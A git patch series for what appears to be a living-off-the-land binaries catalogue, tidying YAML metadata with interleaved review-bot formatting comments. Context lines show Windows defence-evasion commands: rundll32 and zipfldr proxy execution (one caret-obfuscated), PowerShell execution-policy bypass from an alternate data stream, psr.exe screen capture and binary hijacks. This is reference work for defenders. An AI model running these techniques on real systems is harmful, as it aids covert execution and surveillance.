+ Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows +Full_Path: + - Path: c:\windows\system32\url.dll + - Path: c:\windows\syswow64\url.dll +Code_Sample: + - Code: +Detection: + - IOC: +Resources: + - Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ + - Link: https://twitter.com/DissectMalware/status/995348436353470465 + - Link: https://twitter.com/bohops/status/974043815655956481 + - Link: https://twitter.com/yeyint_mth/status/997355558070927360 + - Link: https://twitter.com/Hexacorn/status/974063407321223168 + - Link: https://windows10dll.nirsoft.net/url_dll.html +Acknowledgement: + - Person: Adam (OpenURL) + Handle: '@hexacorn' + - Person: Jimmy (OpenURL) + Handle: '@bohops' + - Person: Malwrologist (FileProtocolHandler - HTA) + Handle: '@DissectMalware' + - Person: r0lan (Obfuscation) + Handle: '@r0lan' +--- diff --git a/yml/OSLibraries/Zipfldr.yml b/yml/OSLibraries/Zipfldr.yml index a22a8a7..d72ecf1 100644 --- a/yml/OSLibraries/Zipfldr.yml +++ b/yml/OSLibraries/Zipfldr.yml 
@@ -1,39 +1,39 @@ ---- -Name: Zipfldr.dll -Description: Compressed Folder library -Author: -Created: 2018-05-25 -Commands: - - Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe - Description: Launch an executable payload by calling RouteTheCall. - UseCase: Launch an executable. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e - Description: Launch an executable payload by calling RouteTheCall (obfuscated). - UseCase: Launch an executable. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows -Full_Path: - - Path: c:\windows\system32\zipfldr.dll - - Path: c:\windows\syswow64\zipfldr.dll -Code_Sample: - - Code: -Detection: - - IOC: -Resources: - - Link: https://twitter.com/moriarty_meng/status/977848311603380224 - - Link: https://twitter.com/bohops/status/997896811904929792 - - Link: https://windows10dll.nirsoft.net/zipfldr_dll.html -Acknowledgement: - - Person: Moriarty (Execution) - Handle: '@moriarty_meng' - - Person: r0lan (Obfuscation) - Handle: '@r0lan' ---- +--- +Name: Zipfldr.dll +Description: Compressed Folder library +Author: +Created: 2018-05-25 +Commands: + - Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe + Description: Launch an executable payload by calling RouteTheCall. + UseCase: Launch an executable. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e + Description: Launch an executable payload by calling RouteTheCall (obfuscated). + UseCase: Launch an executable. 
+ Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows +Full_Path: + - Path: c:\windows\system32\zipfldr.dll + - Path: c:\windows\syswow64\zipfldr.dll +Code_Sample: + - Code: +Detection: + - IOC: +Resources: + - Link: https://twitter.com/moriarty_meng/status/977848311603380224 + - Link: https://twitter.com/bohops/status/997896811904929792 + - Link: https://windows10dll.nirsoft.net/zipfldr_dll.html +Acknowledgement: + - Person: Moriarty (Execution) + Handle: '@moriarty_meng' + - Person: r0lan (Obfuscation) + Handle: '@r0lan' +--- From 5ec4de562be1e936be4b46f4da1a29e7e252aecc Mon Sep 17 00:00:00 2001 From: Wietze Date: Sun, 10 Jan 2021 15:45:25 +0000 Subject: [PATCH 04/19] Fixed acknowledgements --- YML-Template.yml | 4 ++-- yml/LOLUtilz/OSBinaries/Explorer.yml | 4 +++- yml/LOLUtilz/OSBinaries/Netsh.yml | 2 -- yml/LOLUtilz/OSBinaries/Nltest.yml | 4 +++- yml/LOLUtilz/OSBinaries/Openwith.yml | 5 +++-- yml/LOLUtilz/OSBinaries/Powershell.yml | 4 +++- yml/LOLUtilz/OSBinaries/Psr.yml | 1 - yml/LOLUtilz/OSBinaries/Robocopy.yml | 2 -- yml/LOLUtilz/OtherBinaries/AcroRd32.yml | 4 +++- yml/LOLUtilz/OtherBinaries/Gpup.yml | 4 +++- yml/LOLUtilz/OtherBinaries/Nlnotes.yml | 4 +++- yml/LOLUtilz/OtherBinaries/Notes.yml | 4 +++- yml/LOLUtilz/OtherBinaries/Nvudisp.yml | 5 ++++- yml/LOLUtilz/OtherBinaries/Nvuhda6.yml | 4 +++- yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml | 4 +++- yml/LOLUtilz/OtherBinaries/Setup.yml | 4 +++- yml/LOLUtilz/OtherBinaries/Usbinst.yml | 4 +++- yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml | 4 +++- yml/LOLUtilz/OtherScripts/Testxlst.yml | 4 +++- yml/OSLibraries/Advpack.yml | 2 +- yml/OtherMSBinaries/Cdb.yml | 2 +- yml/OtherMSBinaries/Tracker.yml | 2 +- 22 files changed, 51 insertions(+), 26 deletions(-) diff --git a/YML-Template.yml b/YML-Template.yml index 5b3b17a..44c0e0b 100644 --- a/YML-Template.yml +++ b/YML-Template.yml 
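Review bot: in the Url.yml and Zipfldr.yml hunks (`-1,78 +1,78` and `-1,39 +1,39`) every line is deleted and re-added although the only textual change is `MItreLink` to `MitreLink`, which points to a line-ending or trailing-whitespace change riding along with the fix; normalising endings in a separate commit (or via `* text=auto` in .gitattributes) would leave a handful of changed lines that can actually be reviewed. Patch 07 of this series then renames `UseCase` to `Usecase` in these same two files, so folding that rename in here would avoid rewriting them twice. Separately, `Code_Sample:` with an empty `- Code:` and `Detection:` with an empty `- IOC:` load as a one-element list holding a null value, whereas the LOLUtilz files on this page use `Code_Sample: []` and `Detection: []`; settling on one empty form keeps every consumer of these files simpler.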
@@ -34,7 +34,7 @@ Resources: - Link: Threatintelreport... Acknowledgement: - Person: John Doe - Handle: @johndoe + Handle: '@johndoe' - Person: Ola Norman - Handle: @olaNor + Handle: '@olaNor' --- diff --git a/yml/LOLUtilz/OSBinaries/Explorer.yml b/yml/LOLUtilz/OSBinaries/Explorer.yml index cdb2ddd..bcd987d 100644 --- a/yml/LOLUtilz/OSBinaries/Explorer.yml +++ b/yml/LOLUtilz/OSBinaries/Explorer.yml @@ -14,5 +14,7 @@ Code_Sample: [] Detection: [] Resources: - https://twitter.com/bohops/status/986984122563391488 -Notes: Thanks to Jimmy - @bohops +Acknowledgement: + - Person: Jimmy + Handle: '@bohops' diff --git a/yml/LOLUtilz/OSBinaries/Netsh.yml b/yml/LOLUtilz/OSBinaries/Netsh.yml index d6fd688..7e4ce80 100644 --- a/yml/LOLUtilz/OSBinaries/Netsh.yml +++ b/yml/LOLUtilz/OSBinaries/Netsh.yml @@ -22,5 +22,3 @@ Resources: - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md - https://attack.mitre.org/wiki/Technique/T1128 - https://twitter.com/teemuluotio/status/990532938952527873 -Notes: '' - diff --git a/yml/LOLUtilz/OSBinaries/Nltest.yml b/yml/LOLUtilz/OSBinaries/Nltest.yml index 390bc03..4288719 100644 --- a/yml/LOLUtilz/OSBinaries/Nltest.yml +++ b/yml/LOLUtilz/OSBinaries/Nltest.yml @@ -14,4 +14,6 @@ Detection: [] Resources: - https://twitter.com/sysopfb/status/986799053668139009 - https://ss64.com/nt/nltest.html -Notes: Thanks to Sysopfb - @sysopfb +Acknowledgement: + - Person: Sysopfb + Handle: '@sysopfb' diff --git a/yml/LOLUtilz/OSBinaries/Openwith.yml b/yml/LOLUtilz/OSBinaries/Openwith.yml index 829f41a..656dc31 100644 --- a/yml/LOLUtilz/OSBinaries/Openwith.yml +++ b/yml/LOLUtilz/OSBinaries/Openwith.yml @@ -16,5 +16,6 @@ Code_Sample: [] Detection: [] Resources: - https://twitter.com/harr0ey/status/991670870384021504 -Notes: Thanks to Matt harr0ey - @harr0ey - +Acknowledgement: + - Person: Matt harr0ey + Handle: '@harr0ey' 
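Review bot: quoting `'@johndoe'` and `'@olaNor'` in the YML-Template.yml hunk is required rather than cosmetic, since `@` is a reserved indicator in YAML and cannot start a plain scalar, so the unquoted handles made the template itself unparseable; a one-line comment in the template saying that handles must be quoted would stop contributors copying the old form back in. The Explorer, Nltest and Openwith hunks replace free-text `Notes: Thanks to X - @handle` with structured `Acknowledgement` entries, while the Netsh hunk only drops `Notes: ''` and adds nothing; if consumers expect the key to be present, `Acknowledgement: []` keeps the files uniform. Given the misspelt keys this same patch fixes further down (`Acknowledegment`, `Acknoledgement`, `Acknowledgment`), a CI step that loads every file and checks its keys against the template would catch this class of drift before merge.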
diff --git a/yml/LOLUtilz/OSBinaries/Powershell.yml b/yml/LOLUtilz/OSBinaries/Powershell.yml index eac5ec1..dfcc47b 100644 --- a/yml/LOLUtilz/OSBinaries/Powershell.yml +++ b/yml/LOLUtilz/OSBinaries/Powershell.yml @@ -14,5 +14,7 @@ Code_Sample: [] Detection: [] Resources: - https://twitter.com/Moriarty_Meng/status/984380793383370752 -Notes: Thanks to Moriarty - @Moriarty_Meng +Acknowledgement: + - Person: Moriarty + Handle: '@Moriarty_Meng' diff --git a/yml/LOLUtilz/OSBinaries/Psr.yml b/yml/LOLUtilz/OSBinaries/Psr.yml index bf0c3a2..eeafb02 100644 --- a/yml/LOLUtilz/OSBinaries/Psr.yml +++ b/yml/LOLUtilz/OSBinaries/Psr.yml @@ -18,5 +18,4 @@ Code_Sample: [] Detection: [] Resources: - https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf -Notes: 'Thanks to ' diff --git a/yml/LOLUtilz/OSBinaries/Robocopy.yml b/yml/LOLUtilz/OSBinaries/Robocopy.yml index a4bc42d..a14102d 100644 --- a/yml/LOLUtilz/OSBinaries/Robocopy.yml +++ b/yml/LOLUtilz/OSBinaries/Robocopy.yml @@ -16,5 +16,3 @@ Code_Sample: [] Detection: [] Resources: - https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx -Notes: Thanks to Name of guy - @twitterhandle - diff --git a/yml/LOLUtilz/OtherBinaries/AcroRd32.yml b/yml/LOLUtilz/OtherBinaries/AcroRd32.yml index 0a2b30e..81af1bd 100644 --- a/yml/LOLUtilz/OtherBinaries/AcroRd32.yml +++ b/yml/LOLUtilz/OtherBinaries/AcroRd32.yml @@ -13,4 +13,6 @@ Code_Sample: [] Detection: [] Resources: - https://twitter.com/pabraeken/status/997997818362155008 -Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken +Acknowledgement: + - Person: Pierre-Alexandre Braeken + Handle: '@pabraeken' diff --git a/yml/LOLUtilz/OtherBinaries/Gpup.yml b/yml/LOLUtilz/OtherBinaries/Gpup.yml index ce35964..a704097 100644 --- a/yml/LOLUtilz/OtherBinaries/Gpup.yml +++ b/yml/LOLUtilz/OtherBinaries/Gpup.yml 
@@ -13,4 +13,6 @@ Code_Sample: [] Detection: [] Resources: - https://twitter.com/pabraeken/status/997892519827558400 -Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken +Acknowledgement: + - Person: Pierre-Alexandre Braeken + Handle: '@pabraeken' diff --git a/yml/LOLUtilz/OtherBinaries/Nlnotes.yml b/yml/LOLUtilz/OtherBinaries/Nlnotes.yml index a66bdba..0e9615e 100644 --- a/yml/LOLUtilz/OtherBinaries/Nlnotes.yml +++ b/yml/LOLUtilz/OtherBinaries/Nlnotes.yml @@ -14,4 +14,6 @@ Detection: [] Resources: - https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f - https://twitter.com/HanseSecure/status/995578436059127808 -Notes: Thanks to Daniel Bohannon - @danielhbohannon +Acknowledgement: + - Person: Daniel Bohannon + Handle: '@danielhbohannon' diff --git a/yml/LOLUtilz/OtherBinaries/Notes.yml b/yml/LOLUtilz/OtherBinaries/Notes.yml index 79d3bab..479ae55 100644 --- a/yml/LOLUtilz/OtherBinaries/Notes.yml +++ b/yml/LOLUtilz/OtherBinaries/Notes.yml @@ -14,4 +14,6 @@ Detection: [] Resources: - https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f - https://twitter.com/HanseSecure/status/995578436059127808 -Notes: Thanks to Daniel Bohannon - @danielhbohannon +Acknowledgement: + - Person: Daniel Bohannon + Handle: '@danielhbohannon' diff --git a/yml/LOLUtilz/OtherBinaries/Nvudisp.yml b/yml/LOLUtilz/OtherBinaries/Nvudisp.yml index b421a69..d0d439d 100644 --- a/yml/LOLUtilz/OtherBinaries/Nvudisp.yml +++ b/yml/LOLUtilz/OtherBinaries/Nvudisp.yml @@ -23,4 +23,7 @@ Code_Sample: [] Detection: [] Resources: - http://sysadminconcombre.blogspot.ca/2018/04/run-system-commands-through-nvidia.html -Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken +Acknowledgement: + - Person: Pierre-Alexandre Braeken + Handle: '@pabraeken' + diff --git a/yml/LOLUtilz/OtherBinaries/Nvuhda6.yml b/yml/LOLUtilz/OtherBinaries/Nvuhda6.yml index c6cdbeb..f7961f8 100644 --- a/yml/LOLUtilz/OtherBinaries/Nvuhda6.yml +++ b/yml/LOLUtilz/OtherBinaries/Nvuhda6.yml 
@@ -23,4 +23,6 @@ Code_Sample: [] Detection: [] Resources: - http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/ -Notes: Thanks to Adam - @hexacorn +Acknowledgement: + - Person: Adam + Handle: '@hexacorn' diff --git a/yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml b/yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml index 50e4bfb..f5cf18d 100644 --- a/yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml +++ b/yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml @@ -13,4 +13,6 @@ Code_Sample: [] Detection: [] Resources: - https://twitter.com/pabraeken/status/994213164484001793 -Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken +Acknowledgement: + - Person: Pierre-Alexandre Braeken + Handle: '@pabraeken' diff --git a/yml/LOLUtilz/OtherBinaries/Setup.yml b/yml/LOLUtilz/OtherBinaries/Setup.yml index d777ed7..0dac609 100644 --- a/yml/LOLUtilz/OtherBinaries/Setup.yml +++ b/yml/LOLUtilz/OtherBinaries/Setup.yml @@ -13,4 +13,6 @@ Code_Sample: [] Detection: [] Resources: - https://twitter.com/pabraeken/status/994381620588236800 -Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken +Acknowledgement: + - Person: Pierre-Alexandre Braeken + Handle: '@pabraeken' diff --git a/yml/LOLUtilz/OtherBinaries/Usbinst.yml b/yml/LOLUtilz/OtherBinaries/Usbinst.yml index abcd144..4c31160 100644 --- a/yml/LOLUtilz/OtherBinaries/Usbinst.yml +++ b/yml/LOLUtilz/OtherBinaries/Usbinst.yml @@ -13,4 +13,6 @@ Code_Sample: [] Detection: [] Resources: - https://twitter.com/pabraeken/status/993514357807108096 -Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken +Acknowledgement: + - Person: Pierre-Alexandre Braeken + Handle: '@pabraeken' diff --git a/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml b/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml index 3702e0f..593dea1 100644 --- a/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml +++ b/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml 
@@ -13,4 +13,6 @@ Code_Sample: [] Detection: [] Resources: - https://twitter.com/pabraeken/status/993497996179492864 -Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken +Acknowledgement: + - Person: Pierre-Alexandre Braeken + Handle: '@pabraeken' diff --git a/yml/LOLUtilz/OtherScripts/Testxlst.yml b/yml/LOLUtilz/OtherScripts/Testxlst.yml index 05eb340..029eee3 100644 --- a/yml/LOLUtilz/OtherScripts/Testxlst.yml +++ b/yml/LOLUtilz/OtherScripts/Testxlst.yml @@ -25,4 +25,6 @@ Detection: [] Resources: - https://twitter.com/bohops/status/993314069116485632 - https://github.com/mhammond/pywin32 -Notes: Thanks to Jimmy - @bohops +Acknowledgement: + - Person: Jimmy + Handle: '@bohops' diff --git a/yml/OSLibraries/Advpack.yml b/yml/OSLibraries/Advpack.yml index 7d61259..cca0d1b 100644 --- a/yml/OSLibraries/Advpack.yml +++ b/yml/OSLibraries/Advpack.yml @@ -55,7 +55,7 @@ Resources: - Link: https://twitter.com/ItsReallyNick/status/967859147977850880 - Link: https://twitter.com/bohops/status/974497123101179904 - Link: https://twitter.com/moriarty_meng/status/977848311603380224 -Acknowledegment: +Acknowledgement: - Person: Jimmy (LaunchINFSection) Handle: '@bohops' - Person: Fabrizio (RegisterOCX - DLL) diff --git a/yml/OtherMSBinaries/Cdb.yml b/yml/OtherMSBinaries/Cdb.yml index 0183c57..db03291 100644 --- a/yml/OtherMSBinaries/Cdb.yml +++ b/yml/OtherMSBinaries/Cdb.yml @@ -23,7 +23,7 @@ Resources: - Link: http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html - Link: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options - Link: https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda -Acknoledgement: +Acknowledgement: - Person: Matt Graeber Handle: '@mattifestation' --- diff --git a/yml/OtherMSBinaries/Tracker.yml b/yml/OtherMSBinaries/Tracker.yml index e0c4fc2..700bc28 100644 --- a/yml/OtherMSBinaries/Tracker.yml +++ b/yml/OtherMSBinaries/Tracker.yml 
@@ -29,7 +29,7 @@ Detection: Resources: - Link: https://twitter.com/subTee/status/793151392185589760 - Link: https://attack.mitre.org/wiki/Execution -Acknowledgment: +Acknowledgement: - Person: Casey Smith Handle: '@subTee' --- From fc223eb3d88dcfbd1e9857a619279e93121a2052 Mon Sep 17 00:00:00 2001 From: Wietze Date: Sun, 10 Jan 2021 15:48:20 +0000 Subject: [PATCH 05/19] Remove/fix unnecessary Categories field --- yml/LOLUtilz/OSBinaries/Explorer.yml | 1 - yml/LOLUtilz/OSBinaries/Netsh.yml | 1 - yml/LOLUtilz/OSBinaries/Nltest.yml | 1 - yml/LOLUtilz/OSBinaries/Openwith.yml | 1 - yml/LOLUtilz/OSBinaries/Powershell.yml | 1 - yml/LOLUtilz/OSBinaries/Psr.yml | 1 - yml/LOLUtilz/OSBinaries/Robocopy.yml | 1 - yml/LOLUtilz/OtherBinaries/AcroRd32.yml | 1 - yml/LOLUtilz/OtherBinaries/Gpup.yml | 1 - yml/LOLUtilz/OtherBinaries/Nlnotes.yml | 1 - yml/LOLUtilz/OtherBinaries/Notes.yml | 1 - yml/LOLUtilz/OtherBinaries/Nvudisp.yml | 1 - yml/LOLUtilz/OtherBinaries/Nvuhda6.yml | 1 - yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml | 1 - yml/LOLUtilz/OtherBinaries/Setup.yml | 1 - yml/LOLUtilz/OtherBinaries/Usbinst.yml | 1 - yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml | 1 - yml/LOLUtilz/OtherScripts/Testxlst.yml | 4 ++-- 18 files changed, 2 insertions(+), 19 deletions(-) diff --git a/yml/LOLUtilz/OSBinaries/Explorer.yml b/yml/LOLUtilz/OSBinaries/Explorer.yml index bcd987d..362816d 100644 --- a/yml/LOLUtilz/OSBinaries/Explorer.yml +++ b/yml/LOLUtilz/OSBinaries/Explorer.yml @@ -3,7 +3,6 @@ Name: Explorer.exe Description: Execute Author: '' Created: 2018-05-25 -Categories: [] Commands: - Command: explorer.exe calc.exe Description: 'Executes calc.exe as a subprocess of explorer.exe.' diff --git a/yml/LOLUtilz/OSBinaries/Netsh.yml b/yml/LOLUtilz/OSBinaries/Netsh.yml index 7e4ce80..bb00211 100644 --- a/yml/LOLUtilz/OSBinaries/Netsh.yml +++ b/yml/LOLUtilz/OSBinaries/Netsh.yml 
@@ -3,7 +3,6 @@ Name: Netsh.exe Description: Execute, Surveillance Author: '' Created: 2018-05-25 -Categories: [] Commands: - Command: | netsh.exe trace start capture=yes filemode=append persistent=yes tracefile=\\server\share\file.etl IPv4.Address=!() diff --git a/yml/LOLUtilz/OSBinaries/Nltest.yml b/yml/LOLUtilz/OSBinaries/Nltest.yml index 4288719..38b00df 100644 --- a/yml/LOLUtilz/OSBinaries/Nltest.yml +++ b/yml/LOLUtilz/OSBinaries/Nltest.yml @@ -3,7 +3,6 @@ Name: Nltest.exe Description: Credentials Author: '' Created: 2018-05-25 -Categories: [] Commands: - Command: nltest.exe /SERVER:192.168.1.10 /QUERY Description: '' diff --git a/yml/LOLUtilz/OSBinaries/Openwith.yml b/yml/LOLUtilz/OSBinaries/Openwith.yml index 656dc31..97600aa 100644 --- a/yml/LOLUtilz/OSBinaries/Openwith.yml +++ b/yml/LOLUtilz/OSBinaries/Openwith.yml @@ -3,7 +3,6 @@ Name: Openwith.exe Description: Execute Author: '' Created: 2018-05-25 -Categories: [] Commands: - Command: OpenWith.exe /c C:\test.hta Description: Opens the target file with the default application. diff --git a/yml/LOLUtilz/OSBinaries/Powershell.yml b/yml/LOLUtilz/OSBinaries/Powershell.yml index dfcc47b..da89149 100644 --- a/yml/LOLUtilz/OSBinaries/Powershell.yml +++ b/yml/LOLUtilz/OSBinaries/Powershell.yml @@ -3,7 +3,6 @@ Name: Powershell.exe Description: Execute, Read ADS Author: '' Created: 2018-05-25 -Categories: [] Commands: - Command: powershell -ep bypass - < c:\temp:ttt Description: Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS). diff --git a/yml/LOLUtilz/OSBinaries/Psr.yml b/yml/LOLUtilz/OSBinaries/Psr.yml index eeafb02..7d529ed 100644 --- a/yml/LOLUtilz/OSBinaries/Psr.yml +++ b/yml/LOLUtilz/OSBinaries/Psr.yml @@ -3,7 +3,6 @@ Name: Psr.exe Description: Surveillance Author: '' Created: 2018-05-25 -Categories: [] Commands: - Command: psr.exe /start /gui 0 /output c:\users\user\out.zip Description: Capture screenshots of the desktop and save them in the target .ZIP file. 
diff --git a/yml/LOLUtilz/OSBinaries/Robocopy.yml b/yml/LOLUtilz/OSBinaries/Robocopy.yml index a14102d..ceecc8b 100644 --- a/yml/LOLUtilz/OSBinaries/Robocopy.yml +++ b/yml/LOLUtilz/OSBinaries/Robocopy.yml @@ -3,7 +3,6 @@ Name: Robocopy.exe Description: Copy Author: '' Created: 2018-05-25 -Categories: [] Commands: - Command: Robocopy.exe C:\SourceFolder C:\DestFolder Description: Copy the entire contents of the SourceFolder to the DestFolder. diff --git a/yml/LOLUtilz/OtherBinaries/AcroRd32.yml b/yml/LOLUtilz/OtherBinaries/AcroRd32.yml index 81af1bd..0e0b27f 100644 --- a/yml/LOLUtilz/OtherBinaries/AcroRd32.yml +++ b/yml/LOLUtilz/OtherBinaries/AcroRd32.yml @@ -3,7 +3,6 @@ Name: AcroRd32.exe Description: Execute Author: '' Created: 2018-05-25 -Categories: [] Commands: - Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary Description: Hijack RdrCEF.exe with a payload executable to launch when opening Adobe diff --git a/yml/LOLUtilz/OtherBinaries/Gpup.yml b/yml/LOLUtilz/OtherBinaries/Gpup.yml index a704097..43332a2 100644 --- a/yml/LOLUtilz/OtherBinaries/Gpup.yml +++ b/yml/LOLUtilz/OtherBinaries/Gpup.yml @@ -3,7 +3,6 @@ Name: Gpup.exe Description: Execute Author: '' Created: 2018-05-25 -Categories: [] Commands: - Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe Description: Execute another command through gpup.exe (Notepad++ binary). diff --git a/yml/LOLUtilz/OtherBinaries/Nlnotes.yml b/yml/LOLUtilz/OtherBinaries/Nlnotes.yml index 0e9615e..c33ccf4 100644 --- a/yml/LOLUtilz/OtherBinaries/Nlnotes.yml +++ b/yml/LOLUtilz/OtherBinaries/Nlnotes.yml @@ -3,7 +3,6 @@ Name: Nlnotes.exe Description: Execute Author: '' Created: 2018-05-25 -Categories: [] Commands: - Command: NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } Description: Run PowerShell via LotusNotes. 
diff --git a/yml/LOLUtilz/OtherBinaries/Notes.yml b/yml/LOLUtilz/OtherBinaries/Notes.yml index 479ae55..1b0bbab 100644 --- a/yml/LOLUtilz/OtherBinaries/Notes.yml +++ b/yml/LOLUtilz/OtherBinaries/Notes.yml @@ -3,7 +3,6 @@ Name: Notes.exe Description: Execute Author: '' Created: 2018-05-25 -Categories: [] Commands: - Command: Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } Description: Run PowerShell via LotusNotes. diff --git a/yml/LOLUtilz/OtherBinaries/Nvudisp.yml b/yml/LOLUtilz/OtherBinaries/Nvudisp.yml index d0d439d..c3fdbcf 100644 --- a/yml/LOLUtilz/OtherBinaries/Nvudisp.yml +++ b/yml/LOLUtilz/OtherBinaries/Nvudisp.yml @@ -3,7 +3,6 @@ Name: Nvudisp.exe Description: Execute, Copy, Add registry, Create shortcut, kill process Author: '' Created: 2018-05-25 -Categories: [] Commands: - Command: Nvudisp.exe System calc.exe Description: Execute calc.exe as a subprocess. diff --git a/yml/LOLUtilz/OtherBinaries/Nvuhda6.yml b/yml/LOLUtilz/OtherBinaries/Nvuhda6.yml index f7961f8..0d696a6 100644 --- a/yml/LOLUtilz/OtherBinaries/Nvuhda6.yml +++ b/yml/LOLUtilz/OtherBinaries/Nvuhda6.yml @@ -3,7 +3,6 @@ Name: Nvuhda6.exe Description: Execute, Copy, Add registry, Create shortcut, kill process Author: '' Created: 2018-05-25 -Categories: [] Commands: - Command: nvuhda6.exe System calc.exe Description: Execute calc.exe as a subprocess. diff --git a/yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml b/yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml index f5cf18d..8c97780 100644 --- a/yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml +++ b/yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml @@ -3,7 +3,6 @@ Name: ROCCAT_Swarm.exe Description: Execute Author: '' Created: 2018-05-25 -Categories: [] Commands: - Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe Description: Hijack ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe 
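Review bot: dropping the empty top-level `Categories: []` in these LOLUtilz hunks is fine, but the context lines show the category vocabulary living in the top-level `Description` field instead (`Execute, Surveillance` for Netsh, `Credentials` for Nltest, `Execute, Copy, Add registry, Create shortcut, kill process` for Nvudisp, `Persistence` for VBoxDrvInst), whereas the OSLibraries files carry `Category: Execute` under each command and use `Description` for prose. If the aim of this commit is to clean up categories, moving these terms to a per-command `Category` would make the two file families queryable the same way. The same applies to `Author: ''` here against the null `Author:` in the OSLibraries files; one empty form is easier for a loader to handle consistently.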
diff --git a/yml/LOLUtilz/OtherBinaries/Setup.yml b/yml/LOLUtilz/OtherBinaries/Setup.yml index 0dac609..8c775f1 100644 --- a/yml/LOLUtilz/OtherBinaries/Setup.yml +++ b/yml/LOLUtilz/OtherBinaries/Setup.yml @@ -3,7 +3,6 @@ Name: Setup.exe Description: Execute Author: '' Created: 2018-05-25 -Categories: [] Commands: - Command: Run Setup.exe Description: Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload. diff --git a/yml/LOLUtilz/OtherBinaries/Usbinst.yml b/yml/LOLUtilz/OtherBinaries/Usbinst.yml index 4c31160..3cfaf97 100644 --- a/yml/LOLUtilz/OtherBinaries/Usbinst.yml +++ b/yml/LOLUtilz/OtherBinaries/Usbinst.yml @@ -3,7 +3,6 @@ Name: Usbinst.exe Description: Execute Author: '' Created: 2018-05-25 -Categories: [] Commands: - Command: Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf" Description: Execute calc.exe through DefaultInstall Section Directive in INF file. diff --git a/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml b/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml index 593dea1..f264cb8 100644 --- a/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml +++ b/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml @@ -3,7 +3,6 @@ Name: VBoxDrvInst.exe Description: Persistence Author: '' Created: 2018-05-25 -Categories: [] Commands: - Command: VBoxDrvInst.exe driver executeinf c:\temp\calc.inf Description: Set registry key-value for persistance via INF file call through VBoxDrvInst.exe diff --git a/yml/LOLUtilz/OtherScripts/Testxlst.yml b/yml/LOLUtilz/OtherScripts/Testxlst.yml index 029eee3..2fa25ed 100644 --- a/yml/LOLUtilz/OtherScripts/Testxlst.yml +++ b/yml/LOLUtilz/OtherScripts/Testxlst.yml 
